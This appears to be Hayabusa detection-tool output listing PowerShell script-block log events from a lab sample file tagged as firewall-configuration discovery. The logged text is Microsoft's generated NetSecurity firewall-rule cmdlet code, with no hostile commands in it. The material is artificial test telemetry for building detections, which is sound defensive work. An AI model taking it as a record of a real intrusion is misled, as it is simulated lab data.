[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LSM')] [bool] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Owner}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] 
[Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [System.Management.Automation.WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LocalUser}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUser}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] 
[ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"{ $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters 
$__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 
'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = 
${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Direction')) { [object]$__cmdletization_value = ${Direction} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; 
Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy')) { [object]$__cmdletization_value = ${EdgeTraversalPolicy} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LooseSourceMapping')) { [object]$__cmdletization_value = ${LooseSourceMapping} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} 
} else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalOnlyMapping')) { [object]$__cmdletization_value = ${LocalOnlyMapping} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else {",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Owner')) { [object]$__cmdletization_value = ${Owner} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Owner'; ParameterType = 
'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = 
$false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { 
[object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 
'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletizat,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ion_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; 